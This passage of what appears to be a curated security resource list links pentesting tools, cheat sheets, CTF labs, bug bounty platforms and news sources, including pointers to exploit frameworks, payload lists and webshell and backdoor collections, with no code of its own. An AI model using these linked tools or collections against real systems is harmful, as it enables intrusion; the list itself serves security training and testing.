✅ <a href="https://twitter.com/Malwarebytes"><b>@Malwarebytes</b></a> - most trusted security company. Unmatched threat visibility.<br>
✅ <a href="https://twitter.com/sansforensics"><b>@sansforensics</b></a> - the world's leading Digital Forensics and Incident Response provider.<br>
✅ <a href="https://twitter.com/attcyber"><b>@attcyber</b></a> - AT&T Cybersecurity’s Edge-to-Edge technologies provide threat intelligence, and more.<br>
✅ <a href="https://twitter.com/TheManyHatsClub"><b>@TheManyHatsClub</b></a> - an information security focused podcast and group of individuals from all walks of life.<br>
✅ <a href="https://twitter.com/hedgehogsec"><b>@hedgehogsec</b></a> - Hedgehog Cyber. Gibraltar and Manchester's top boutique information security firm.<br>
✅ <a href="https://twitter.com/NCSC"><b>@NCSC</b></a> - the National Cyber Security Centre. Helping to make the UK the safest place to live and work online.<br>
✅ <a href="https://twitter.com/Synacktiv"><b>@Synacktiv</b></a> - IT security experts.<br>
</p>
##### :black_small_square: A piece of history
<p>
✅ <a href="http://ftp.arl.army.mil/~mike/howto/"><b>How to Do Things at ARL</b></a> - how to configure modems, scan images, record CD-ROMs, and other.<b>*</b><br>
</p>
##### :black_small_square: Other
<p>
✅ <a href="https://www.youtube.com/watch?v=3QnD2c4Xovk"><b>Diffie-Hellman Key Exchange (short version)</b></a> - how Diffie-Hellman Key Exchange worked.<br>
</p>
#### Hacking/Penetration Testing [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Pentesters arsenal tools
<p>
✅ <a href="http://www.syhunt.com/sandcat/"><b>Sandcat Browser</b></a> - a penetration-oriented browser with plenty of advanced functionality already built in.<br>
✅ <a href="https://www.metasploit.com/"><b>Metasploit</b></a> - tool and framework for pentesting system, web and many more, contains a lot a ready to use exploit.<br>
✅ <a href="https://portswigger.net/burp"><b>Burp Suite</b></a> - tool for testing web app security, intercepting proxy to replay, inject, scan and fuzz.<br>
✅ <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project"><b>OWASP Zed Attack Proxy</b></a> - intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br>
✅ <a href="http://w3af.org/"><b>w3af</b></a> - is a Web Application Attack and Audit Framework.<br>
✅ <a href="https://mitmproxy.org/"><b>mitmproxy</b></a> - an interactive TLS-capable intercepting HTTP proxy for penetration testers.<br>
✅ <a href="https://cirt.net/Nikto2"><b>Nikto2</b></a> - web server scanner which performs comprehensive tests against web servers for multiple items.<br>
✅ <a href="http://sqlmap.org/"><b>sqlmap</b></a> - tool that automates the process of detecting and exploiting SQL injection flaws.<br>
✅ <a href="https://github.com/lanmaster53/recon-ng"><b>Recon-ng</b></a> - is a full-featured Web Reconnaissance framework written in Python.<br>
✅ <a href="https://github.com/Tib3rius/AutoRecon"><b>AutoRecon</b></a> - is a network reconnaissance tool which performs automated enumeration of services.<br>
✅ <a href="https://www.faradaysec.com/"><b>Faraday</b></a> - an Integrated Multiuser Pentest Environment.<br>
✅ <a href="https://github.com/s0md3v/Photon"><b>Photon</b></a> - incredibly fast crawler designed for OSINT.<br>
✅ <a href="https://github.com/s0md3v/XSStrike"><b>XSStrike</b></a> - most advanced XSS detection suite.<br>
✅ <a href="https://github.com/1N3/Sn1per"><b>Sn1per</b></a> - automated pentest framework for offensive security experts.<br>
✅ <a href="https://github.com/future-architect/vuls"><b>vuls</b></a> - is an agent-less vulnerability scanner for Linux, FreeBSD, and other.<br>
✅ <a href="https://github.com/google/tsunami-security-scanner"><b>tsunami</b></a> - is a general purpose network security scanner with an extensible plugin system.<br>
✅ <a href="https://github.com/michenriksen/aquatone"><b>aquatone</b></a> - a tool for domain flyovers.<br>
✅ <a href="https://github.com/GitHackTools/BillCipher"><b>BillCipher</b></a> - information gathering tool for a website or IP address.<br>
✅ <a href="https://github.com/Ekultek/WhatWaf"><b>WhatWaf</b></a> - detect and bypass web application firewalls and protection systems.<br>
✅ <a href="https://github.com/s0md3v/Corsy"><b>Corsy</b></a> - CORS misconfiguration scanner.<br>
✅ <a href="https://github.com/evyatarmeged/Raccoon"><b>Raccoon</b></a> - is a high performance offensive security tool for reconnaissance and vulnerability scanning.<br>
✅ <a href="https://github.com/Nekmo/dirhunt"><b>dirhunt</b></a> - find web directories without bruteforce.<br>
✅ <a href="https://www.openwall.com/john/"><b>John The Ripper</b></a> - is a fast password cracker, currently available for many flavors of Unix, Windows, and other.<br>
✅ <a href="https://hashcat.net/hashcat/"><b>hashcat</b></a> - world's fastest and most advanced password recovery utility.<br>
✅ <a href="http://lcamtuf.coredump.cx/p0f3/"><b>p0f</b></a> - is a tool to identify the players behind any incidental TCP/IP communications.<br>
✅ <a href="https://github.com/mozilla/ssh_scan"><b>ssh_scan</b></a> - a prototype SSH configuration and policy scanner.<br>
✅ <a href="https://github.com/woj-ciech/LeakLooker"><b>LeakLooker</b></a> - find open databases - powered by Binaryedge.io<br>
✅ <a href="https://github.com/offensive-security/exploitdb"><b>exploitdb</b></a> - searchable archive from The Exploit Database.<br>
✅ <a href="https://github.com/vulnersCom/getsploit"><b>getsploit</b></a> - is a command line utility for searching and downloading exploits.<br>
✅ <a href="https://github.com/zardus/ctf-tools"><b>ctf-tools</b></a> - some setup scripts for security research tools.<br>
✅ <a href="https://github.com/Gallopsled/pwntools"><b>pwntools</b></a> - CTF framework and exploit development library.<br>
✅ <a href="https://github.com/bl4de/security-tools"><b>security-tools</b></a> - collection of small security tools created mostly in Python. CTFs, pentests and so on.<br>
✅ <a href="https://github.com/leonteale/pentestpackage"><b>pentestpackage</b></a> - is a package of Pentest scripts.<br>
✅ <a href="https://github.com/dloss/python-pentest-tools"><b>python-pentest-tools</b></a> - python tools for penetration testers.<br>
✅ <a href="https://github.com/fuzzdb-project/fuzzdb"><b>fuzzdb</b></a> - dictionary of attack patterns and primitives for black-box application fault injection.<br>
✅ <a href="https://github.com/google/AFL"><b>AFL</b></a> - is a free software fuzzer maintained by Google.<br>
✅ <a href="https://github.com/AFLplusplus/AFLplusplus"><b>AFL++</b></a> - is AFL with community patches.<br>
✅ <a href="https://github.com/google/syzkaller"><b>syzkaller</b></a> - is an unsupervised, coverage-guided kernel fuzzer.<br>
✅ <a href="https://github.com/pwndbg/pwndbg"><b>pwndbg</b></a> - exploit development and reverse engineering with GDB made easy.<br>
✅ <a href="https://github.com/longld/peda"><b>GDB PEDA</b></a> - Python Exploit Development Assistance for GDB.<br>
✅ <a href="https://www.hex-rays.com/products/ida/index.shtml"><b>IDA</b></a> - multi-processor disassembler and debugger useful for reverse engineering malware.<br>
✅ <a href="https://github.com/radare/radare2"><b>radare2</b></a> - framework for reverse-engineering and analyzing binaries.<br>
✅ <a href="https://github.com/threat9/routersploit"><b>routersploit</b></a> - exploitation framework for embedded devices.<br>
✅ <a href="https://github.com/NationalSecurityAgency/ghidra"><b>Ghidra</b></a> - is a software reverse engineering (SRE) framework.<br>
✅ <a href="https://cutter.re/"><b>Cutter</b></a> - is an SRE platform integrating Ghidra's decompiler.<br>
✅ <a href="https://github.com/salesforce/vulnreport"><b>Vulnreport</b></a> - open-source pentesting management and automation platform by Salesforce Product Security.<br>
✅ <a href="https://github.com/sc0tfree/mentalist"><b>Mentalist</b></a> - is a graphical tool for custom wordlist generation.<br>
✅ <a href="https://github.com/archerysec/archerysec"><b>archerysec</b></a> - vulnerability assessment and management helps to perform scans and manage vulnerabilities.<br>
✅ <a href="https://github.com/j3ssie/Osmedeus"><b>Osmedeus</b></a> - fully automated offensive security tool for reconnaissance and vulnerability scanning.<br>
✅ <a href="https://github.com/beefproject/beef"><b>beef</b></a> - the browser exploitation framework project.<br>
✅ <a href="https://github.com/NullArray/AutoSploit"><b>AutoSploit</b></a> - automated mass exploiter.<br>
✅ <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br>
✅ <a href="https://github.com/VirusTotal/yara"><b>yara</b></a> - the pattern matching swiss knife.<br>
✅ <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a> - a little tool to play with Windows security.<br>
✅ <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a> - hunt down social media accounts by username across social networks.<br>
✅ <a href="https://owasp.org/www-project-threat-dragon/"><b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br>
</p>
##### :black_small_square: Pentests bookmarks collection
<p>
✅ <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetration testing execution standard.<br>
✅ <a href="https://www.amanhardikar.com/mindmaps/Practice.html"><b>Pentests MindMap</b></a> - amazing mind map with vulnerable apps and systems.<br>
✅ <a href="https://www.amanhardikar.com/mindmaps/webapptest.html"><b>WebApps Security Tests MindMap</b></a> - incredible mind map for WebApps security tests.<br>
✅ <a href="https://brutelogic.com.br/blog/"><b>Brute XSS</b></a> - master the art of Cross Site Scripting.<br>
✅ <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><b>XSS cheat sheet</b></a> - contains many vectors that can help you bypass WAFs and filters.<br>
✅ <a href="https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/"><b>Offensive Security Bookmarks</b></a> - security bookmarks collection, all things that author need to pass OSCP.<br>
✅ <a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets"><b>Awesome Pentest Cheat Sheets</b></a> - collection of the cheat sheets useful for pentesting.<br>
✅ <a href="https://github.com/Hack-with-Github/Awesome-Hacking"><b>Awesome Hacking by HackWithGithub</b></a> - awesome lists for hackers, pentesters and security researchers.<br>
✅ <a href="https://github.com/carpedm20/awesome-hacking"><b>Awesome Hacking by carpedm20</b></a> - a curated list of awesome hacking tutorials, tools and resources.<br>
✅ <a href="https://github.com/vitalysim/Awesome-Hacking-Resources"><b>Awesome Hacking Resources</b></a> - collection of hacking/penetration testing resources to make you better.<br>
✅ <a href="https://github.com/enaqx/awesome-pentest"><b>Awesome Pentest</b></a> - collection of awesome penetration testing resources, tools and other shiny things.<br>
✅ <a href="https://github.com/m4ll0k/Awesome-Hacking-Tools"><b>Awesome-Hacking-Tools</b></a> - is a curated list of awesome Hacking Tools.<br>
✅ <a href="https://github.com/ksanchezcld/Hacking_Cheat_Sheet"><b>Hacking Cheat Sheet</b></a> - author hacking and pentesting notes.<br>
✅ <a href="https://github.com/toolswatch/blackhat-arsenal-tools"><b>blackhat-arsenal-tools</b></a> - official Black Hat arsenal security tools repository.<br>
✅ <a href="https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon"><b>Penetration Testing and WebApp Cheat Sheets</b></a> - the complete list of Infosec related cheat sheets.<br>
✅ <a href="https://github.com/The-Art-of-Hacking/h4cker"><b>Cyber Security Resources</b></a> - includes thousands of cybersecurity-related references and resources.<br>
✅ <a href="https://github.com/jhaddix/pentest-bookmarks"><b>Pentest Bookmarks</b></a> - there are a LOT of pentesting blogs.<br>
✅ <a href="https://github.com/OlivierLaflamme/Cheatsheet-God"><b>Cheatsheet-God</b></a> - Penetration Testing Reference Bank - OSCP/PTP & PTX Cheatsheet.<br>
✅ <a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook"><b>ThreatHunter-Playbook</b></a> - to aid the development of techniques and hypothesis for hunting campaigns.<br>
✅ <a href="https://github.com/hmaverickadams/Beginner-Network-Pentesting"><b>Beginner-Network-Pentesting</b></a> - notes for beginner network pentesting course.<br>
✅ <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - is a list of resources that author have been gathering in preparation for the OSCP.<br>
✅ <a href="https://github.com/swisskyrepo/PayloadsAllTheThings"><b>PayloadsAllTheThings</b></a> - a list of useful payloads and bypass for Web Application Security and Pentest/CTF.<br>
✅ <a href="https://github.com/foospidy/payloads"><b>payloads</b></a> - git all the Payloads! A collection of web attack payloads.<br>
✅ <a href="https://github.com/payloadbox/command-injection-payload-list"><b>command-injection-payload-list</b></a> - command injection payload list.<br>
✅ <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>Awesome Shodan Search Queries</b></a> - great search queries to plug into Shodan.<br>
✅ <a href="https://github.com/s0md3v/AwesomeXSS"><b>AwesomeXSS</b></a> - is a collection of Awesome XSS resources.<br>
✅ <a href="https://github.com/JohnTroony/php-webshells"><b>php-webshells</b></a> - common php webshells.<br>
✅ <a href="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/"><b>Pentesting Tools Cheat Sheet</b></a> - a quick reference high level overview for typical penetration testing.<br>
✅ <a href="https://cheatsheetseries.owasp.org/"><b>OWASP Cheat Sheet Series</b></a> - is a collection of high value information on specific application security topics.<br>
✅ <a href="https://jeremylong.github.io/DependencyCheck/index.html"><b>OWASP dependency-check</b></a> - is an open source solution the OWASP Top 10 2013 entry.<br>
✅ <a href="https://www.owasp.org/index.php/OWASP_Proactive_Controls"><b>OWASP ProActive Controls</b></a> - OWASP Top 10 Proactive Controls 2018.<br>
✅ <a href="https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"><b>PENTESTING-BIBLE</b></a> - hacking & penetration testing & red team & cyber security resources.<br>
✅ <a href="https://github.com/nixawk/pentest-wiki"><b>pentest-wiki</b></a> - is a free online security knowledge library for pentesters/researchers.<br>
✅ <a href="https://media.defcon.org/"><b>DEF CON Media Server</b></a> - great stuff from DEFCON.<br>
✅ <a href="https://github.com/rshipp/awesome-malware-analysis"><b>Awesome Malware Analysis</b></a> - a curated list of awesome malware analysis tools and resources.<br>
✅ <a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/"><b>SQL Injection Cheat Sheet</b></a> - detailed technical stuff about the many different variants of the SQL Injection.<br>
✅ <a href="http://kb.entersoft.co.in/"><b>Entersoft Knowledge Base</b></a> - great and detailed reference about vulnerabilities.<br>
✅ <a href="http://html5sec.org/"><b>HTML5 Security Cheatsheet</b></a> - a collection of HTML5 related XSS attack vectors.<br>
✅ <a href="http://evuln.com/tools/xss-encoder/"><b>XSS String Encoder</b></a> - for generating XSS code to check your input validation filters against XSS.<br>
✅ <a href="https://gtfobins.github.io/"><b>GTFOBins</b></a> - list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.<br>
✅ <a href="https://guif.re/"><b>Guifre Ruiz Notes</b></a> - collection of security, system, network and pentest cheatsheets.<br>
✅ <a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html"><b>SSRF Tips</b></a> - a collection of SSRF Tips.<br>
✅ <a href="http://shell-storm.org/repo/CTF/"><b>shell-storm repo CTF</b></a> - great archive of CTFs.<br>
✅ <a href="https://github.com/bl4de/ctf"><b>ctf</b></a> - CTF (Capture The Flag) writeups, code snippets, notes, scripts.<br>
✅ <a href="https://github.com/orangetw/My-CTF-Web-Challenges"><b>My-CTF-Web-Challenges</b></a> - collection of CTF Web challenges.<br>
✅ <a href="https://github.com/OWASP/owasp-mstg"><b>MSTG</b></a> - The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing.<br>
✅ <a href="https://github.com/sdcampbell/Internal-Pentest-Playbook"><b>Internal-Pentest-Playbook</b></a> - notes on the most common things for an Internal Network Penetration Test.<br>
✅ <a href="https://github.com/streaak/keyhacks"><b>KeyHacks</b></a> - shows quick ways in which API keys leaked by a bug bounty program can be checked.<br>
✅ <a href="https://github.com/securitum/research"><b>securitum/research</b></a> - various Proof of Concepts of security research performed by Securitum.<br>
✅ <a href="https://github.com/juliocesarfort/public-pentesting-reports"><b>public-pentesting-reports</b></a> - is a list of public pentest reports released by several consulting security groups.<br>
✅ <a href="https://github.com/djadmin/awesome-bug-bounty"><b>awesome-bug-bounty</b></a> - is a comprehensive curated list of available Bug Bounty.<br>
✅ <a href="https://github.com/ngalongc/bug-bounty-reference"><b>bug-bounty-reference</b></a> - is a list of bug bounty write-ups.<br>
✅ <a href="https://github.com/devanshbatham/Awesome-Bugbounty-Writeups"><b>Awesome-Bugbounty-Writeups</b></a> - is a curated list of bugbounty writeups.<br>
✅ <a href="https://pentester.land/list-of-bug-bounty-writeups.html"><b>Bug bounty writeups</b></a> - list of bug bounty writeups (2012-2020).<br>
✅ <a href="https://hackso.me/"><b>hackso.me</b></a> - a great journey into security.<br>
</p>
##### :black_small_square: Backdoors/exploits
<p>
✅ <a href="https://github.com/bartblaze/PHP-backdoors"><b>PHP-backdoors</b></a> - a collection of PHP backdoors. For educational or testing purposes only.<br>
</p>
##### :black_small_square: Wordlists and Weak passwords
<p>
✅ <a href="https://weakpass.com/"><b>Weakpass</b></a> - for any kind of bruteforce find wordlists or unleash the power of them all at once!<br>
✅ <a href="https://hashes.org/"><b>Hashes.org</b></a> - is a free online hash resolving service incorporating many unparalleled techniques.<br>
✅ <a href="https://github.com/danielmiessler/SecLists"><b>SecLists</b></a> - collection of multiple types of lists used during security assessments, collected in one place.<br>
✅ <a href="https://github.com/berzerk0/Probable-Wordlists"><b>Probable-Wordlists</b></a> - sorted by probability originally created for password generation and testing.<br>
✅ <a href="https://wiki.skullsecurity.org/index.php?title=Passwords"><b>skullsecurity passwords</b></a> - password dictionaries and leaked passwords repository.<br>
✅ <a href="https://bezpieka.org/polski-slownik-premium-polish-wordlist"><b>Polish PREMIUM Dictionary</b></a> - official dictionary created by the team on the forum bezpieka.org.<b>*</b> <sup><a href="https://sourceforge.net/projects/kali-linux/files/Wordlist/">1</sup><br>
✅ <a href="https://github.com/insidetrust/statistically-likely-usernames"><b>statistically-likely-usernames</b></a> - wordlists for creating statistically likely username lists.<br>
</p>
##### :black_small_square: Bounty platforms
<p>
✅ <a href="https://www.yeswehack.com/"><b>YesWeHack</b></a> - bug bounty platform with infosec jobs.<br>
✅ <a href="https://www.openbugbounty.org/"><b>Openbugbounty</b></a> - allows any security researcher reporting a vulnerability on any website.<br>
✅ <a href="https://www.hackerone.com/"><b>hackerone</b></a> - global hacker community to surface the most relevant security issues.<br>
✅ <a href="https://www.bugcrowd.com/"><b>bugcrowd</b></a> - crowdsourced cybersecurity for the enterprise.<br>
✅ <a href="https://crowdshield.com/"><b>Crowdshield</b></a> - crowdsourced security & bug bounty management.<br>
✅ <a href="https://www.synack.com/"><b>Synack</b></a> - crowdsourced security & bug bounty programs, crowd security intelligence platform, and more.<br>
✅ <a href="https://hacktrophy.com/en/"><b>Hacktrophy</b></a> - bug bounty platform.<br>
</p>
##### :black_small_square: Web Training Apps (local installation)
<p>
✅ <a href="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project"><b>OWASP-VWAD</b></a> - comprehensive and well maintained registry of all known vulnerable web applications.<br>
✅ <a href="http://www.dvwa.co.uk/"><b>DVWA</b></a> - PHP/MySQL web application that is damn vulnerable.<br>
✅ <a href="https://metasploit.help.rapid7.com/docs/metasploitable-2"><b>metasploitable2</b></a> - vulnerable web application amongst security researchers.<br>
✅ <a href="https://github.com/rapid7/metasploitable3"><b>metasploitable3</b></a> - is a VM that is built from the ground up with a large amount of security vulnerabilities.<br>
✅ <a href="https://github.com/stamparm/DSVW"><b>DSVW</b></a> - is a deliberately vulnerable web application written in under 100 lines of code.<br>
✅ <a href="https://sourceforge.net/projects/mutillidae/"><b>OWASP Mutillidae II</b></a> - free, open source, deliberately vulnerable web-application.<br>
✅ <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project"><b>OWASP Juice Shop Project</b></a> - the most bug-free vulnerable application in existence.<br>
✅ <a href="https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project"><b>OWASP Node js Goat Project</b></a> - OWASP Top 10 security risks apply to web apps developed using Node.js.<br>
✅ <a href="https://github.com/iteratec/juicy-ctf"><b>juicy-ctf</b></a> - run Capture the Flags and Security Trainings with OWASP Juice Shop.<br>
✅ <a href="https://github.com/OWASP/SecurityShepherd"><b>SecurityShepherd</b></a> - web and mobile application security training platform.<br>
✅ <a href="https://github.com/opendns/Security_Ninjas_AppSec_Training"><b>Security Ninjas</b></a> - open source application security training program.<br>
✅ <a href="https://github.com/rapid7/hackazon"><b>hackazon</b></a> - a modern vulnerable web app.<br>
✅ <a href="https://github.com/appsecco/dvna"><b>dvna</b></a> - damn vulnerable NodeJS application.<br>
✅ <a href="https://github.com/DefectDojo/django-DefectDojo"><b>django-DefectDojo</b></a> - is an open-source application vulnerability correlation and security orchestration tool.<br>
✅ <a href="https://google-gruyere.appspot.com/"><b>Google Gruyere</b></a> - web application exploits and defenses.<br>
✅ <a href="https://github.com/amolnaik4/bodhi"><b>Bodhi</b></a> - is a playground focused on learning the exploitation of client-side web vulnerabilities.<br>
✅ <a href="https://websploit.h4cker.org/"><b>Websploit</b></a> - single vm lab with the purpose of combining several vulnerable appliations in one environment.<br>
✅ <a href="https://github.com/vulhub/vulhub"><b>vulhub</b></a> - pre-built Vulnerable Environments based on docker-compose.<br>
✅ <a href="https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/"><b>CloudGoat 2</b></a> - the new & improved "Vulnerable by Design"
AWS deployment tool.<br>
✅ <a href="https://github.com/globocom/secDevLabs"><b>secDevLabs</b></a> - is a laboratory for learning secure web development in a practical manner.<br>
✅ <a href="https://github.com/incredibleindishell/CORS-vulnerable-Lab"><b>CORS-vulnerable-Lab</b></a> - sample vulnerable code and its exploit code.<br>
✅ <a href="https://github.com/moloch--/RootTheBox"><b>RootTheBox</b></a> - a Game of Hackers (CTF Scoreboard & Game Manager).<br>
✅ <a href="https://application.security/"><b>KONTRA</b></a> - application security training (OWASP Top Web & Api).<br>
</p>
##### :black_small_square: Labs (ethical hacking platforms/trainings/CTFs)
<p>
✅ <a href="https://www.offensive-security.com/"><b>Offensive Security</b></a> - true performance-based penetration testing training for over a decade.<br>
✅ <a href="https://www.hackthebox.eu/"><b>Hack The Box</b></a> - online platform allowing you to test your penetration testing skills.<br>
✅ <a href="https://www.hacking-lab.com/index.html"><b>Hacking-Lab</b></a> - online ethical hacking, computer network and security challenge platform.<br>
✅ <a href="http://pwnable.kr/index.php"><b>pwnable.kr</b></a> - non-commercial wargame site which provides various pwn challenges.<br>
✅ <a href="https://pwnable.tw/"><b>Pwnable.tw</b></a> - is a wargame site for hackers to test and expand their binary exploiting skills.<br>
✅ <a href="https://picoctf.com/"><b>picoCTF</b></a> - is a free computer security game targeted at middle and high school students.<br>
✅ <a href="https://ctflearn.com/"><b>CTFlearn</b></a> - is an online platform built to help ethical hackers learn and practice their cybersecurity knowledge.<br>
✅ <a href="https://ctftime.org/"><b>ctftime</b></a> - CTF archive and a place, where you can get some another CTF-related info.<br>
✅ <a href="https://silesiasecuritylab.com/"><b>Silesia Security Lab</b></a> - high quality security testing services.<br>
✅ <a href="https://practicalpentestlabs.com/"><b>Practical Pentest Labs</b></a> - pentest lab, take your Hacking skills to the next level.<br>
✅ <a href="https://www.root-me.org/?lang=en"><b>Root Me</b></a> - the fast, easy, and affordable way to train your hacking skills.<br>
✅ <a href="https://rozwal.to/login"><b>rozwal.to</b></a> - a great platform to train your pentesting skills.<br>
✅ <a href="https://tryhackme.com/"><b>TryHackMe</b></a> - learning Cyber Security made easy.<br>
✅ <a href="https://hackxor.net/"><b>hackxor</b></a> - is a realistic web application hacking game, designed to help players of all abilities develop their skills.<br>
✅ <a href="http://hack-yourself-first.com/"><b>Hack Yourself First</b></a> - it's full of nasty app sec holes.<br>
✅ <a href="http://overthewire.org/wargames/"><b>OverTheWire</b></a> - can help you to learn and practice security concepts in the form of fun-filled games.<br>
✅ <a href="https://labs.wizard-security.net/"><b>Wizard Labs</b></a> - is an online Penetration Testing Lab.<br>
✅ <a href="https://pentesterlab.com/"><b>PentesterLab</b></a> - provides vulnerable systems that can be used to test and understand vulnerabilities.<br>
✅ <a href="https://ringzer0ctf.com/"><b>RingZer0</b></a> - tons of challenges designed to test and improve your hacking skills.<br>
✅ <a href="http://www.try2hack.nl/"><b>try2hack</b></a> - several security-oriented challenges for your entertainment.<br>
✅ <a href="https://www.ubeeri.com/preconfig-labs"><b>Ubeeri</b></a> - preconfigured lab environments.<br>
✅ <a href="https://lab.pentestit.ru/"><b>Pentestit</b></a> - emulate IT infrastructures of real companies for legal pen testing and improving pentest skills.<br>
✅ <a href="https://microcorruption.com/login"><b>Microcorruption</b></a> - reversal challenges done in the web interface.<br>
✅ <a href="https://crackmes.one/"><b>Crackmes</b></a> - download crackmes to help improve your reverse engineering skills.<br>
✅ <a href="https://domgo.at/cxss/intro"><b>DomGoat</b></a> - DOM XSS security learning and practicing platform.<br>
✅ <a href="https://chall.stypr.com"><b>Stereotyped Challenges</b></a> - upgrade your web hacking techniques today!<br>
✅ <a href="https://www.vulnhub.com/"><b>Vulnhub</b></a> - allows anyone to gain practical 'hands-on' experience in digital security.<br>
✅ <a href="https://w3challs.com/"><b>W3Challs</b></a> - is a penetration testing training platform, which offers various computer challenges.<br>
✅ <a href="https://ringzer0ctf.com/challenges"><b>RingZer0 CTF</b></a> - offers you tons of challenges designed to test and improve your hacking skills.<br>
✅ <a href="https://hack.me/"><b>Hack.me</b></a> - a platform where you can build, host and share vulnerable web apps for educational purposes.<br>
✅ <a href="https://www.hackthis.co.uk/levels/"><b>HackThis!</b></a> - discover how hacks, dumps and defacements are performed and secure your website.<br>
✅ <a href="https://www.enigmagroup.org/#"><b>Enigma Group WebApp Training</b></a> - these challenges cover the exploits listed in the OWASP Top 10 Project.<br>
✅ <a href="https://challenges.re/"><b>Reverse Engineering Challenges</b></a> - challenges, exercises, problems and tasks - by level, by type, and more.<br>
✅ <a href="https://0x00sec.org/"><b>0x00sec</b></a> - the home of the Hacker - Malware, Reverse Engineering, and Computer Science.<br>
✅ <a href="https://www.wechall.net/challs"><b>We Chall</b></a> - there are exist a lots of different challenge types.<br>
✅ <a href="https://www.hackergateway.com/"><b>Hacker Gateway</b></a> - is the go-to place for hackers who want to test their skills.<br>
✅ <a href="https://www.hacker101.com/"><b>Hacker101</b></a> - is a free class for web security.<br>
✅ <a href="https://contained.af/"><b>contained.af</b></a> - a stupid game for learning about containers, capabilities, and syscalls.<br>
✅ <a href="http://flaws.cloud/"><b>flAWS challenge!</b></a> - a series of levels you'll learn about common mistakes and gotchas when using AWS.<br>
✅ <a href="https://cybersecurity.wtf"><b>CyberSec WTF</b></a> - provides web hacking challenges derived from bounty write-ups.<br>
✅ <a href="https://ctfchallenge.co.uk/login"><b>CTF Challenge</b></a> - CTF Web App challenges.<br>
✅ <a href="https://capturetheflag.withgoogle.com"><b>gCTF</b></a> - most of the challenges used in the Google CTF 2017.<br>
✅ <a href="https://www.hackthissite.org/pages/index/index.php"><b>Hack This Site</b></a> - is a free, safe and legal training ground for hackers.<br>
✅ <a href="https://attackdefense.com"><b>Attack & Defense</b></a> - is a browser-based cloud labs.<br>
✅ <a href="https://cryptohack.org/"><b>Cryptohack</b></a> - a fun platform for learning modern cryptography.<br>
✅ <a href="https://cryptopals.com/"><b>Cryptopals</b></a> - the cryptopals crypto challenges.<br>
</p>
##### :black_small_square: CTF platforms
<p>
✅ <a href="https://github.com/facebook/fbctf"><b>fbctf</b></a> - platform to host Capture the Flag competitions.<br>
✅ <a href="https://github.com/google/ctfscoreboard"><b>ctfscoreboard</b></a> - scoreboard for Capture The Flag competitions.<br>
</p>
##### :black_small_square: Other resources
<p>
✅ <a href="https://github.com/bugcrowd/bugcrowd_university"><b>Bugcrowd University</b></a> - open source education content for the researcher community.<br>
✅ <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - a list of resources and scripts that I have been gathering in preparation for the OSCP.<br>
✅ <a href="https://medium.com/@cxosmo/owasp-top-10-real-world-examples-part-1-a540c4ea2df5"><b>OWASP Top 10: Real-World Examples</b></a> - test your web apps with real-world examples (two-part series).<br>
✅ <a href="http://phrack.org/index.html"><b>phrack.org</b></a> - an awesome collection of articles from several respected hackers and other thinkers.<br>
✅ <a href="https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources"><b>Practical-Ethical-Hacking-Resources</b></a> - compilation of resources from TCM's Udemy Course.<br>
</p>
#### Your daily knowledge and news [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: RSS Readers
<p>
✅ <a href="https://feedly.com/"><b>Feedly</b></a> - organize, read and share what matters to you.<br>
✅ <a href="https://www.inoreader.com/"><b>Inoreader</b></a> - similar to feedly with a support for filtering what you fetch from rss.<br>
</p>
##### :black_small_square: IRC Channels
<p>
✅ <a href="https://wiki.hackerspaces.org/IRC_Channel"><b>#hackerspaces</b></a> - hackerspace IRC channels.<br>
</p>
##### :black_small_square: Security
<p>
✅ <a href="https://thehackernews.com/"><b>The Hacker News</b></a> - leading news source dedicated to promoting awareness for security experts and hackers.<br>
✅ <a href="https://latesthackingnews.com/"><b>Latest Hacking News</b></a> - provides the latest hacking news, exploits and vulnerabilities for ethical hackers.<br>
✅ <a href="https://securitynewsletter.co/"><b>Security Newsletter</b></a> - security news as a weekly digest (email notifications).<br>
✅ <a href="https://security.googleblog.com/"><b>Google Online Security Blog</b></a> - the latest news and insights from Google on security and safety on the Internet.<br>
✅ <a href="https://blog.qualys.com/"><b>Qualys Blog</b></a> - expert network security guidance and news.<br>
✅ <a href="https://www.darkreading.com/"><b>DARKReading</b></a> - connecting the Information Security Community.<br>
✅ <a href="https://www.darknet.org.uk/"><b>Darknet</b></a> - latest hacking tools, hacker news, cybersecurity best practices, ethical hacking & pen-testing.<br>
✅ <a href="https://twitter.com/disclosedh1"><b>publiclyDisclosed</b></a> - public disclosure watcher who keeps you up to date about the recently disclosed bugs.<br>
✅ <a href="https://www.reddit.com/r/hacking/"><b>Reddit - Hacking</b></a> - a subreddit dedicated to hacking and hackers.<br>
✅ <a href="https://packetstormsecurity.com/"><b>Packet Storm</b></a> - information security services, news, files, tools, exploits, advisories and whitepapers.<br>
